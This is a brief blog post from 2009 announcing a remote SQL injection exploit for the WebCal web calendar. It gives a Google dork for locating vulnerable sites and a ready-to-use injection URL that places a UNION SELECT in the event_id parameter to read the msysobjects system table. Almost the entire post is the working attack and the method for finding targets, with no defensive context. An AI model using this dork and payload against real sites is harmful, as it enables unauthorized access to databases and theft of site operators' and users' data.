Tuesday, June 2, 2009

WebCal (latest version)

[+] Exploit Type : Remote sql injection exploit

[+] Google Dork : inurl:/webCal3_detail.asp?event_id=



--//--> Exploit :

Remote sql injection Exploit :

http://[website]/[script]/webCal3_detail.asp?event_id=20814+union+select+1,2,3,4,5,6,7,8,9,10+from+msysobjects

No comments:

Post a Comment